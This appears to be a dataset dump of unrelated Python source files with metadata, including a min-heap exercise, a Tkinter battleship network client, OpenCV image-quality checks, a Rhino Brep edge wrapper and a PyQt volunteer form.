path('products/add/', views.addCart, name='shop-cartupdate'),\n path('products/delete/', views.deleteCart, name='shop-cartdelete'),\n\n\n]","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"345071919","text":"# Min Heap Construction\n\n# Implement a MinHeap class that supports:\n\n# Building a Min Heap from an input array of integers.\n# Inserting integers in the heap.\n# Removing the heap's minimum / root value.\n# Peeking at the heap's minimum / root value.\n# Sifting integers up and down the heap, which is to be used when inserting and\n# removing values.\n# Note that the heap should be represented in the form of an array.\n\n# Sample Usage\n# array = [48, 12, 24, 7, 8, -5, 24, 391, 24, 56, 2, 6, 8, 41]\n\n# // All operations below are performed sequentially.\n# MinHeap(array): - // instantiate a MinHeap (calls the buildHeap method and\n# populates the heap)\n# buildHeap(array): - [-5, 2, 6, 7, 8, 8, 24, 391, 24, 56, 12, 24, 48, 41]\n# insert(76): - [-5, 2, 6, 7, 8, 8, 24, 391, 24, 56, 12, 24, 48, 41, 76]\n# peek(): -5\n# remove(): -5 [2, 7, 6, 24, 8, 8, 24, 391, 76, 56, 12, 24, 48, 41]\n# peek(): 2\n# remove(): 2 [6, 7, 8, 24, 8, 24, 24, 391, 76, 56, 12, 41, 48]\n# peek(): 6\n# insert(87): - [6, 7, 8, 24, 8, 24, 24, 391, 76, 56, 12, 41, 48, 87]\n\n# Solution\n\ndef swap(array, i, j):\n array[i], array[j] = array[j], array[i]\n\n\nclass MinHeap:\n def __init__(self, array):\n self.heap = self.buildHeap(array)\n\n def buildHeap(self, array):\n parent_index = (len(array) - 2) // 2\n while parent_index >= 0:\n self.siftDown(parent_index, array)\n parent_index -= 1\n return array\n\n def siftDown(self, current_index, heap):\n end_index = len(heap) - 1\n child_one_index = current_index * 2 + 1\n while child_one_index <= end_index:\n child_two_index = current_index * 2 + 2 if current_index * 2 + 2 <= end_index else - 1\n if child_two_index != -1 and heap[child_two_index] < heap[child_one_index]:\n index_to_swap = child_two_index\n else:\n index_to_swap = child_one_index\n if heap[index_to_swap] < heap[current_index]:\n swap(heap, current_index, index_to_swap)\n current_index = index_to_swap\n child_one_index = current_index * 2 + 1\n else:\n break\n\n def siftUp(self, current_index):\n parent_index = (current_index - 1) // 2\n while current_index > 0 and self.heap[current_index] < self.heap[parent_index]:\n swap(self.heap, parent_index, current_index)\n current_index = parent_index\n parent_index = (current_index - 1) // 2\n\n def peek(self):\n if len(self.heap):\n return self.heap[0]\n else:\n return None\n\n def remove(self):\n swap(self.heap, 0, len(self.heap) - 1)\n value = self.heap.pop()\n self.siftDown(0, self.heap)\n return value\n\n def insert(self, value):\n self.heap.append(value)\n self.siftUp(len(self.heap) - 1)","sub_path":"medium/min_heap_construction.py","file_name":"min_heap_construction.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"379218217","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport time\nimport os\n\nfrom datetime import datetime\n\nfrom tvm.common import io\nfrom tvm.common.tvcollection import TVCollection\n\n\ndef _build_record_from_path(path):\n \"\"\"Builds an episode dict entry given the path to an episode on disk.\n\n Args:\n path (str): The absolute path to an episode.\n\n Returns:\n dict: An episode record as a dictionary.\n\n \"\"\"\n path, episode = os.path.split(path)\n episode, _ = os.path.splitext(episode)\n\n path, season = os.path.split(path)\n _, title = os.path.split(path)\n return {'season': season, 'episode': episode, 'title': title}\n\n\ndef find_records(path, include_recorded=False):\n \"\"\"Given a directory `path` to a series, find all episode records.\n\n Episode records will be in the form of a dictionary. The `recorded_at`\n time will be based on the file's created at timestamp. All hidden files\n (i.e. files starting with a period) are ignored from the list of episodes.\n\n Args:\n path (str): The absolute path to a series directory.\n included_recorded (Optional[bool]): Determines whether or not to also\n include episodes that we've recorded in the past. Defaults to False.\n\n Returns:\n list: A list of episode dictionaries found under the `path` directory.\n\n \"\"\"\n dt_mask = '%a %b %d %H:%M:%S %Y'\n\n records = []\n for dir_name, dirs, file_names in os.walk(path):\n dirs[:] = [d for d in dirs if not d.startswith('.')]\n for filename in file_names:\n if filename.startswith('.'):\n continue\n\n record_path = os.path.join(dir_name, filename)\n record = _build_record_from_path(record_path)\n\n # Record already recorded and we're skipping included records.\n if record in TVCollection and not include_recorded:\n continue\n\n created_at = time.ctime(os.path.getmtime(record_path))\n record.update({\n 'recorded_at': datetime.strptime(created_at, dt_mask),\n 'viewed_at': []\n })\n records.append(record)\n return records\n\n\ndef print_records(records):\n records = sorted(records, key=lambda r: r['recorded_at'])\n for record in records:\n io.info2('{recorded_at},{title},{season},{episode}'.format(**record))\n","sub_path":"tvm/apps/create/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"614521105","text":"import open3d as o3d\nimport os\nimport re\n\ndef sorted_aphanumeric(data):\n convert = lambda text: int(text) if text.isdigit() else text.lower()\n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ] \n return sorted(data, key=alphanum_key)\n\npcd = o3d.io.read_point_cloud(\"pointcloud.txt\", format='xyz')\npcd.transform([[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]])\n\ndirlist = sorted_aphanumeric(os.listdir('.'))\n\nfor file in dirlist:\n if file.startswith('viz'):\n print(file)\n votes0 = o3d.io.read_point_cloud(file, format='xyz')\n votes0.paint_uniform_color([0, 0, 0])\n votes0.transform([[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]])\n o3d.visualization.draw_geometries([pcd, votes0], window_name=file[:-10])\n","sub_path":"votenet/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"454675915","text":"#!/usr/local/bin/python3.8\n# -*-coding:Utf-8 -*\nfrom threading import Thread\nfrom threading import RLock\nfrom tkinter import *\nfrom tkinter.ttk import *\nimport pickle\nfrom src.classes.Joueur import *\nfrom src.classes.StructureJoueurs import *\nfrom src.interface_graphique.InterfaceHorsLigne import *\nimport socket\nimport os\nimport time\nfrom src.classes.Partie import *\nfrom src.fonctions.fonctionsInterface import *\n\nclass InterfaceJeuEL(Frame) :\n\tdef __init__(self,fenetre,serveur,joueur,**kwargs) :\n\t\tfenetre.title(\"BattleShip v1 (hors-ligne) \"+joueur.pseudo)\n\t\tFrame.__init__(self, fenetre, width=500, height=700, **kwargs)\n\t\tself.serveur = serveur\n\t\tself.pack(fill=BOTH)\n\t\tself.tst = True\n\t\tself.tstDamier = False\n\t\tself.partieEnCours = True\n\t\tself.fenetre = fenetre\n\t\tself.joueur = joueur\n\t\tself.aPlace = False\n\t\tself.timer = time.time()\n\t\tself.joueur.debutPartie()\n\t\tself.IA = Joueur(\"Ordinateur\")\n\t\tself.d1 = Damier()\n\t\tself.d2 = Damier()\n\t\tself.message = Label(self,text=\"Etape 1 : Placez vos bateaux\")\n\t\tstyle = Style()\n \n\t\tstyle.theme_use('default')\n \n\t\tstyle.configure(\"blue.Horizontal.TProgressbar\", background='blue')\n\t\tself.barreCherche = Progressbar(self,length=100,style=\"blue.Horizontal.TProgressbar\")\n\t\tself.message.pack(fill=X)\n\t\tself.partie = Partie(self.joueur,self.d1,self.IA,self.d2)\n\t\t#self.partie.placerIA()\n\t\tself.partie.tour[0] = self.joueur\n\t\tself.d2 = self.partie.grille2\n\t\tself.grillePerso = GrillePlacement(self,self.partie)\n\t\tself.grilleTir = GrilleTirEL(self,self.grillePerso,self.partie,self.joueur,self.serveur)\n\t\tself.message.pack()\n\t\tself.grillePerso.pack()\n\t\tself.grilleTir.pack(padx=60)\n\t\tself.valider = Button(self,text=\"Valider\",fg=\"white\",bg=\"green\",command=self.valider)\n\t\tself.valider.pack()\n\t\tself.quitter = Button(self,text=\"Quitter\",command=self.quit,fg=\"black\",bg=\"red\")\n\t\tself.quitter.pack()\n\n\tdef quit(self) :\n\t\tself.tst = False\n\t\tif(self.partieEnCours) :\n\t\t\tself.joueur.partieELPerdue()\n\t\tif(not self.tstDamier) :\n\t\t\tself.serveur.send(\"abandon\")\n\t\tself.serveur.send(b\"arret jeu\")\n\t\ttime.sleep(0.1)\n\t\tself.serveur.send(b\"joueur deconnecte\")\n\t\ttime.sleep(0.1)\n\t\tself.serveur.send(pickle.dumps(self.joueur))\n\t\ttime.sleep(0.1)\n\t\tself.serveur.send(b\"fin exit(0)\")\n\t\ttime.sleep(0.1)\n\t\tself.destroy()\n\t\tself.fenetre.destroy()\n\n\tdef valider(self) :\n\t\tif(self.grillePerso.remplie()) :\n\t\t\tself.grillePerso.disableGrille()\n\t\t\t#print(self.partie.grille1)\n\t\t\t#print(self.partie.grille2)\n\t\t\tself.message.config(text=\"Etape 2 : Attente du joueur adverse\")\n\t\t\tself.valider.destroy()\n\t\t\tself.grillePerso.valider.destroy()\n\t\t\tself.grillePerso.choix.pA.destroy()\n\t\t\tself.grillePerso.choix.cT.destroy()\n\t\t\tself.grillePerso.choix.c.destroy()\n\t\t\tself.grillePerso.choix.t.destroy()\n\t\t\tself.grillePerso.choix.sM.destroy()\n\t\t\tself.tstDamier = True\n\t\t\tself.serveur.send(b\"envoi damier\")\n\t\t\ttime.sleep(0.1)\n\t\t\tself.serveur.send(pickle.dumps(self.grillePerso.damier))\n\t\t\ttime.sleep(0.1)\n\t\t\tself.serveur.send(pickle.dumps(self.joueur))\n\t\t\t_osef = self.serveur.recv(9999).decode()\n\t\t\tretour = \"attente\"\n\t\t\t#print(retour)\n\t\t\tself.tstCherche = True\n\t\t\tself.barreCherche.pack()\n\t\t\twhile(self.tstCherche) :\n\t\t\t\tself.tstCherche = (retour==\"attente\")\n\t\t\t\ttime.sleep(0.1)\n\t\t\t\tself.serveur.send(b\"attente damier\")\n\t\t\t\tretour = self.serveur.recv(9999).decode()\n\t\t\t\tif(retour!=\"attente\") :\n\t\t\t\t\tbreak\n\t\t\t\tself.barreCherche.step()\n\t\t\t\ttry :\n\t\t\t\t\tself.barreCherche.update()\n\t\t\t\t\tself.update()\n\t\t\t\texcept :\n\t\t\t\t\tpass\n\t\t\tself.barreCherche.destroy()\n\t\t\tif(retour==\"partie\") :\n\t\t\t\tself.partie = pickle.loads(self.serveur.recv(9999))\n\t\t\t\tself.message.config(text=\"Etape 3 : Jouer\")\n\t\t\t\tself.message.update()\n\t\t\t\tself.update()\n\t\t\t\tif(self.partie.tour[0].pseudo == self.joueur.pseudo) :\n\t\t\t\t\tself.grilleTir.actualiserPartie()\n\t\t\t\t\tself.grilleTir.enableGrille()\n\t\t\t\telse :\n\t\t\t\t\t#self.serveur.send(b\"attente joueur\")\n\t\t\t\t\tretour2 = self.serveur.recv(9999).decode()\n\t\t\t\t\tself.partie = pickle.loads(self.serveur.recv(9999))\n\t\t\t\t\tself.grillePerso.partie = self.partie\n\t\t\t\t\tfor bouton, val in self.grillePerso.grille.listeCases :\n\t\t\t\t\t\ty, x = decoder(bouton.getCoord())\n\t\t\t\t\t\tif(self.partie.joueur1.pseudo == self.joueur.pseudo) :\n\t\t\t\t\t\t\tif(self.partie.grille1.getValue(x,y)==-1) :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"grey\")\n\t\t\t\t\t\t\telif(self.partie.grille1.getValue(x,y)==-2) :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"red\")\n\t\t\t\t\t\t\telif(self.partie.grille1.getValue(x,y)==-3) :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"black\")\n\t\t\t\t\t\t\telif(self.partie.grille1.getValue(x,y)==1) :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"green\")\n\t\t\t\t\t\t\telse :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"white\")\n\t\t\t\t\t\telse :\n\t\t\t\t\t\t\tif(self.partie.grille2.getValue(x,y)==-1) :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"grey\")\n\t\t\t\t\t\t\telif(self.partie.grille2.getValue(x,y)==-2) :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"red\")\n\t\t\t\t\t\t\telif(self.partie.grille2.getValue(x,y)==-3) :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"black\")\n\t\t\t\t\t\t\telif(self.partie.grille2.getValue(x,y)==1) :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"green\")\n\t\t\t\t\t\t\telse :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"white\")\n\t\t\t\t\tself.grilleTir.actualiserPartie()\n\t\t\t\t\tself.grilleTir.enableGrille()\n\t\t\t\t\t\n\t\t\telse :\n\t\t\t\tself.partieEnCours = False\n\t\t\t\tself.message.config(text=\"Le joueur adverse a abandonné...\")\n\t\t\t\tself.joueur.partieELGagnee()\n\n\nclass GrilleTirEL(Frame) :\n\tdef __init__(self,interface,grille,partie,joueur,serveur,**kwargs) :\n\t\tFrame.__init__(self,interface,width = 330,height = 390, **kwargs)\n\t\tself.joueur = joueur\n\t\tself.serveur = serveur\n\t\tself.etat = \"disabled\"\n\t\tself.partie=partie\n\t\tself.grillePerso = grille\n\t\tself.listeBateau = partie.grille2.listeBateau\n\t\tself.interface=interface\n\t\tself.damier = partie.grille2\n\t\tlisteAbs = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\"]\n\t\tlisteOrd = [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\"]\n\t\tself.listeRadio = []\n\t\tLabel(self).grid(row = 0,column=0)\n\n\t\tfor i in range(10):\n\t\t\tLabel(self,text=listeAbs[i],bg=\"white\").grid(column=i+1+15,row=0)\n\t\t\tLabel(self,text=listeOrd[i],bg=\"white\").grid(column=0+15,row=i+1)\n\t\tself.valeur=StringVar()\n\t\tfor i in range(10):\n\t\t\tfor j in range(10):\n\t\t\t\trb = Radiobutton(self, variable=self.valeur, value=encoder(i,j),cursor=\"target\")\n\t\t\t\tif(self.damier.getValue(i,j)==-1) :\n\t\t\t\t\trb.config(bg=\"grey\",fg=\"red\",state=\"disabled\")\n\t\t\t\telif(self.damier.getValue(i,j)==-2) :\n\t\t\t\t\trb.config(bg=\"red\",fg=\"white\",state=\"disabled\")\n\t\t\t\telif(self.damier.getValue(i,j)==-3) :\n\t\t\t\t\trb.config(bg=\"green\",fg=\"red\",state=\"disabled\")\n\t\t\t\telse :\n\t\t\t\t\trb.config(bg=\"white\",fg=\"black\",state=\"disabled\")\n\t\t\t\trb.grid(row=j+1, column=15+i+1)\n\t\t\t\trb.deselect()\n\t\t\t\tself.listeRadio.append(rb)\n\n\t\tself.bouton_tirer = Button(self,text=\"Tirer\",bg=\"red\",fg=\"white\",command=self.tirer,state=\"disabled\",cursor=\"target\")\n\t\tself.bouton_tirer.grid(column=3+15,row=17,columnspan=5)\n\t\t#self.bouton_secours = Button(self,text=\"DEBLOQUE!\",bg=\"red\",fg=\"white\",command=self.enableGrille)\n\t\t#self.bouton_secours.grid(column=3,row=13,columnspan=5)\n\t\tself.texte = Label(self,text=\"\")\n\n\tdef enableGrille(self) :\n\t\tself.etat=\"enabled\"\n\t\tfor rb in self.listeRadio :\n\t\t\tif(rb.cget(\"bg\")==\"white\") :\n\t\t\t\trb.config(state=\"normal\")\n\t\t\t\trb.select()\n\t\tself.bouton_tirer.config(state=\"normal\")\n\n\tdef actualiserPartie(self) :\n\t\tself.partie = self.interface.partie\n\t\tif(self.partie.joueur1.pseudo==self.joueur.pseudo) :\n\t\t\tself.listeBateau = self.partie.grille2.listeBateau\n\t\telse :\n\t\t\tself.listeBateau = self.partie.grille1.listeBateau\n\n\tdef tirer(self) :\n\t\ttry :\n\t\t\tself.partie.tirer(self.valeur.get())\n\t\texcept ToucheException :\n\t\t\tfor rb in self.listeRadio :\n\t\t\t\tif(rb.cget(\"value\")==self.valeur.get()) :\n\t\t\t\t\trb.config(bg=\"red\",state=\"disabled\")\n\t\t\t\trb.config(state=\"disabled\")\n\t\t\t\trb.update()\n\t\t\t\tself.update()\n\t\t\t\tself.interface.update()\n\t\texcept ToucheCouleException :\n\t\t\tposition = []\n\t\t\tfor bat in self.listeBateau :\n\t\t\t\t#print(bat.getPosition)\n\t\t\t\tif(self.valeur.get() in bat.getPosition()) :\n\t\t\t\t\tposition = bat.getPosition()\n\t\t\tfor coord in position :\n\t\t\t\tfor rb in self.listeRadio :\n\t\t\t\t\tif(rb.cget(\"value\")==coord) :\n\t\t\t\t\t\trb.config(bg=\"green\",state=\"disabled\")\n\t\t\t\t\trb.config(state=\"disabled\")\n\t\t\t\t\trb.update()\n\t\t\t\t\tself.update()\n\t\t\t\t\tself.interface.update()\n\t\texcept NoHarmException :\n\t\t\tfor rb in self.listeRadio :\n\t\t\t\tif(rb.cget(\"value\")==self.valeur.get()) :\n\t\t\t\t\trb.config(bg=\"grey\",state=\"disabled\")\n\t\t\t\trb.config(state=\"disabled\")\n\t\t\t\trb.update()\n\t\t\t\tself.update()\n\t\t\t\tself.interface.update()\n\n\t\tself.bouton_tirer.config(state=\"disabled\")\n\t\tself.etat = \"disabled\"\n\t\tself.serveur.send(b\"a joue\")\n\t\ttime.sleep(0.1)\n\t\tself.serveur.send(pickle.dumps(self.partie))\n\t\ttime.sleep(0.1)\n\t\tif(self.partie.testFin()) :\n\t\t\tself.partieEnCours = False\n\t\t\tself.serveur.send(b\"fin partie\")\n\t\t\ttime.sleep(0.1)\n\t\t\tself.joueur.finPartie()\n\t\t\tself.serveur.send(pickle.dumps(self.joueur))\n\t\t\t\"\"\"file = open(\"../localdata/dataJoueur\",\"wb\")\n\t\t\tpickle.dump(self.joueur,file)\n\t\t\tfile.close()\"\"\"\n\t\t\tif(self.partie.gagnant.pseudo==self.joueur.pseudo) :\n\t\t\t\tself.interface.message.config(text=\"Vous avez gagné\",fg=\"green\")\n\t\t\t\t\n\t\t\t\tself.interface.joueur.partieELGagnee()\n\t\t\t\tself.interface.message.update()\n\t\t\t\tself.interface.update()\n\t\t\t\tif(self.interface.joueur.pseudo!=\"__localhost__\") :\n\t\t\t\t\t\"\"\"with open(\"../localdata/dataJoueur\",\"wb\") as file :\n\t\t\t\t\t\tpickle.dump(self.joueur,file)\n\t\t\t\t\t\tfile.close()\"\"\"\n\t\t\t\t\tpass\n\t\t\telse :\n\t\t\t\tself.interface.message.config(text=\"Vous avez perdu\",fg=\"red\")\n\t\t\t\ttry :\n\t\t\t\t\tself.interface.joueur.partieELPerdue()\n\t\t\t\texcept :\n\t\t\t\t\tpass\n\t\t\t\tif(self.interface.joueur.pseudo!=\"__localhost__\") :\n\t\t\t\t\t\"\"\"with open(\"../localdata/dataJoueur\",\"wb\") as file :\n\t\t\t\t\t\tpickle.dump(self.interface.joueur,file)\n\t\t\t\t\t\tfile.close()\"\"\"\n\t\t\t\t\tpass\n\t\telse :\n\t\t\ttry :\n\t\t\t\tself.partie = self.attenteJeu()\n\t\t\texcept PartieTermineeException :\n\t\t\t\tself.joueur.partieELGagnee()\n\t\t\t\tself.joueur.finPartie()\n\t\t\t\tself.interface.message.config(text=\"Le joueur adverse a abandonné\")\n\t\t\t\tself.interface.partieEnCours = False\n\t\t\texcept PartiePerdueException :\n\t\t\t\tself.interface.partieEnCours = False\n\t\t\t\tself.joueur.finPartie()\n\t\t\t\tself.interface.message.config(text=\"Vous avez perdu\",fg=\"red\")\n\t\t\t\tself.joueur.partieELPerdue()\n\t\t\t\tself.serveur.send(b\"renvoi joueur\")\n\t\t\t\ttime.sleep(0.1)\n\t\t\t\tself.serveur.send(pickle.dumps(self.joueur))\n\t\t\t\ttime.sleep(0.1)\n\t\t\telse :\n\t\t\t\tself.grillePerso.partie = self.partie\n\t\t\t\tfor bouton, val in self.grillePerso.grille.listeCases :\n\t\t\t\t\ty, x = decoder(bouton.getCoord())\n\t\t\t\t\tif(self.partie.joueur1.pseudo == self.joueur.pseudo) :\n\t\t\t\t\t\tif(self.partie.grille1.getValue(x,y)==-1) :\n\t\t\t\t\t\t\tbouton.config(bg = \"grey\")\n\t\t\t\t\t\telif(self.partie.grille1.getValue(x,y)==-2) :\n\t\t\t\t\t\t\tbouton.config(bg = \"red\")\n\t\t\t\t\t\telif(self.partie.grille1.getValue(x,y)==-3) :\n\t\t\t\t\t\t\tbouton.config(bg = \"black\")\n\t\t\t\t\t\telif(self.partie.grille1.getValue(x,y)==1) :\n\t\t\t\t\t\t\tbouton.config(bg = \"green\")\n\t\t\t\t\t\telse :\n\t\t\t\t\t\t\tbouton.config(bg = \"white\")\n\t\t\t\t\telse :\n\t\t\t\t\t\tif(self.partie.grille2.getValue(x,y)==-1) :\n\t\t\t\t\t\t\tbouton.config(bg = \"grey\")\n\t\t\t\t\t\telif(self.partie.grille2.getValue(x,y)==-2) :\n\t\t\t\t\t\t\tbouton.config(bg = \"red\")\n\t\t\t\t\t\telif(self.partie.grille2.getValue(x,y)==-3) :\n\t\t\t\t\t\t\tbouton.config(bg = \"black\")\n\t\t\t\t\t\telif(self.partie.grille2.getValue(x,y)==1) :\n\t\t\t\t\t\t\tbouton.config(bg = \"green\")\n\t\t\t\t\t\telse :\n\t\t\t\t\t\t\tbouton.config(bg = \"white\")\n\t\t\t\tself.grillePerso.update()\n\t\t\t\tself.enableGrille()\n\n\tdef attenteJeu(self) :\n\t\tretour = self.serveur.recv(1024).decode()\n\t\tif(retour==\"partie interrompue\") :\n\t\t\traise PartieTermineeException(\"Le joueur adverse a abandonné\")\n\t\telif(retour == \"perdu\") :\n\t\t\traise PartiePerdueException(\"Vous avez perdu\")\n\t\telse :\n\t\t\tretour = pickle.loads(self.serveur.recv(9999))\n\t\t\treturn(retour)","sub_path":"src/interface_graphique/InterfaceJeu.py","file_name":"InterfaceJeu.py","file_ext":"py","file_size_in_byte":11497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"37319301","text":"# Detect image sharpness and brightness\n\n# Importing packages\nimport cv2\nimport matplotlib.pyplot as plt\n\n\n# image sharpness recognition\ndef getImageVar(imgPath):\n\n global sharpness\n sharpness = []\n image = cv2.imread(imgPath)\n\n # Convert to grayscale image\n img2gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n\n # Laplacian operator - edge detection\n imageVar = cv2.Laplacian(img2gray,cv2.CV_64F).var() # var(): Calculate variance\n\n return imageVar\n\n\n# image sharpnesss recognition\ndef getSharpness(imageVar):\n if imageVar <= 50:\n sharpness.append(\"fuzzy\")\n elif imageVar >= 1000:\n sharpness.append(\"sharp\")\n\n return sharpness\n\n\n# image brightness recognition\n# get dark pixels in grayscale image\ndef getBlackPiex(img_path):\n global darkness\n darkness = []\n img = cv2.imread(img_path, 1)\n\n # Convert to grayscale image\n gray_img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n # Get the number of rows and columns of the grayscale matrix\n r,c = gray_img.shape[:2]\n piexs_sum = r*c # total number of pixels\n\n # Get dark pixels in grayscale image\n dark_points = (gray_img < 50) # The artificially setting hyperparameter points that the gray value of 0 ~ 49 is dark\n target_array = gray_img[dark_points]\n dark_sum = target_array.size # the number of dark pixels\n dark_prop = dark_sum / piexs_sum # dark pixels ratio\n\n # Uncomment the line below and show the grayscale histogram\n # hist(img_path)\n\n if dark_prop >= 0.55:\n darkness.append(\"dark\")\n elif dark_prop <= 0.1:\n darkness.append(\"light\")\n\n return darkness\n\n\n# image brightness recognition\n# create the grayscale histogram of image\ndef hist(img_path):\n img = cv2.imread(img_path,1)\n hist = cv2.calcHist([img],[0],None,[256],[0,256])\n plt.plot(hist)\n plt.subplot(121)\n plt.imshow(img,'gray')\n plt.xticks([])\n plt.yticks([])\n plt.title(\"Original\")\n plt.subplot(122)\n plt.hist(img.ravel(),256,[0,256])\n plt.show()","sub_path":"TP_2020/partie4/IngTagging/New_Tags/Quality.py","file_name":"Quality.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"379147276","text":"from compas.geometry import BrepEdge\nfrom compas.geometry import Line\nfrom compas.geometry import Point\nfrom compas.geometry import Circle\nfrom compas_rhino.geometry import RhinoNurbsCurve\nfrom compas_rhino.conversions import curve_to_compas_line\nfrom compas_rhino.conversions import curve_to_compas_circle\nfrom compas_rhino.conversions import line_to_rhino_curve\nfrom compas_rhino.conversions import circle_to_rhino_curve\n\nfrom .vertex import RhinoBrepVertex\n\n\nclass RhinoBrepEdge(BrepEdge):\n \"\"\"A wrapper for Rhino.Geometry.BrepEdge\n\n Attributes\n ----------\n curve : :class:`Rhino.Geometry.Curve3D`\n The underlying geometry of this edge.\n start_vertex : :class:`~compas_rhino.geometry.RhinoBrepVertex`, read-only\n The start vertex of this edge.\n end_vertex : :class:`~compas_rhino.geometry.RhinoBrepVertex`, read-only\n The end vertex of this edge.\n vertices : list[:class:`~compas_rhino.geometry.RhinoBrepVertex`], read-only\n The list of vertices which comprise this edge (start and end)\n is_circle : bool, read-only\n True if the geometry of this edge is a circle, False otherwise.\n is_line : bool, read-only\n True if the geometry of this edge is a line, False otherwise.\n\n \"\"\"\n\n def __init__(self, rhino_edge=None):\n super(RhinoBrepEdge, self).__init__()\n self._edge = None\n self._curve = None\n self._start_vertex = None\n self._end_vertex = None\n if rhino_edge:\n self._set_edge(rhino_edge)\n\n def _set_edge(self, native_edge):\n self._edge = native_edge\n self._curve = self._edge.EdgeCurve\n self._start_vertex = RhinoBrepVertex(self._edge.StartVertex)\n self._end_vertex = RhinoBrepVertex(self._edge.EndVertex)\n\n # ==============================================================================\n # Data\n # ==============================================================================\n\n @property\n def data(self):\n if self.is_line:\n type_ = \"line\"\n curve = curve_to_compas_line(self._curve)\n elif self.is_circle:\n type_ = \"circle\"\n curve = curve_to_compas_circle(self._curve)\n else:\n type_ = \"nurbs\"\n curve = RhinoNurbsCurve.from_rhino(self._curve)\n return {\n \"type\": type_,\n \"value\": curve.data,\n \"points\": [self._start_vertex.point.data, self._end_vertex.point.data],\n }\n\n @data.setter\n def data(self, value):\n curve_type = value[\"type\"]\n if curve_type == \"line\":\n self._curve = line_to_rhino_curve(\n Line.from_data(value[\"value\"])\n ) # this returns a Nurbs Curve, why?\n elif curve_type == \"circle\":\n self._curve = circle_to_rhino_curve(\n Circle.from_data(value[\"value\"])\n ) # this returns a Nurbs Curve, why?\n else:\n self._curve = RhinoNurbsCurve.from_data(value[\"value\"]).rhino_curve\n # TODO: can a single edge be defined with more than start and end vertices?\n self._start_vertex, self._end_vertex = RhinoBrepVertex(), RhinoBrepVertex()\n self._start_vertex._point = Point.from_data(value[\"points\"][0])\n self._end_vertex._point = Point.from_data(value[\"points\"][1])\n\n # ==============================================================================\n # Properties\n # ==============================================================================\n\n @property\n def curve(self):\n return self._curve\n\n @property\n def start_vertex(self):\n return self._start_vertex\n\n @property\n def end_vertex(self):\n return self._end_vertex\n\n @property\n def vertices(self):\n return [self._start_vertex, self._end_vertex]\n\n @property\n def is_circle(self):\n return self._curve.IsCircle()\n\n @property\n def is_line(self):\n return self._curve.IsLinear()\n","sub_path":"src/compas_rhino/geometry/brep/edge.py","file_name":"edge.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"584561412","text":"import sys\nfrom SheetsUpdater import *\nfrom PyQt5.QtWidgets import (QWidget, QPushButton, QLineEdit, QVBoxLayout, QHBoxLayout, QInputDialog, QApplication, QLabel, QGridLayout, QCheckBox, QListWidget)\nfrom PyQt5.QtGui import QPainter, QColor, QFont\nfrom PyQt5.QtCore import Qt\n\nclass GroupResults(QWidget):\n \n def __init__(self, SessID, grouplist):\n super().__init__()\n self.initUI(SessID, grouplist)\n\n def initUI(self, SessID, grouplist):\n self.SessID = SessID\n self.grouplist = grouplist\n self.groupName = self.grouplist.pop()\n titleStr = 'Enter information for ' + self.groupName\n self.titleLabel = QLabel(titleStr)\n\n self.realVolsLabel = QLabel('Enter Number of Actual Volunteers:')\n self.realVols = QLineEdit(self)\n self.realVolsBox = QVBoxLayout()\n self.realVolsBox.addWidget(self.realVolsLabel)\n self.realVolsBox.addWidget(self.realVols)\n\n self.hrsWorkedLabel = QLabel('Enter Hours Worked:')\n self.hrsWorked = QLineEdit(self) \n self.hrsWorkedBox = QVBoxLayout()\n self.hrsWorkedBox.addWidget(self.hrsWorkedLabel)\n self.hrsWorkedBox.addWidget(self.hrsWorked)\n\n self.NextGroupButton = QPushButton('Next Group')\n self.NextGroupButton.clicked.connect(self.enterNextGroup)\n\n self.GroupBox = QVBoxLayout()\n self.GroupBox.addWidget(self.titleLabel)\n self.GroupBox.addLayout(self.realVolsBox)\n self.GroupBox.addLayout(self.hrsWorkedBox)\n self.GroupBox.addWidget(self.NextGroupButton)\n\n self.setLayout(self.GroupBox)\n self.setGeometry(300, 300, 300, 300)\n self.setWindowTitle('Enter Group Turnout')\n self.show()\n\n def enterNextGroup(self):\n addGroupResults(self.SessID, self.groupName, self.realVols.text(), self.hrsWorked.text())\n updateGroupVolStats(self.groupName, self.hrsWorked.text(), self.realVols.text())\n if self.grouplist == []:\n self.close()\n else:\n self.NextGroupWindow = GroupResults(self.SessID, self.grouplist)\n self.NextGroupWindow.show()\n self.close()\n \n\n","sub_path":"GroupResults.py","file_name":"GroupResults.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} 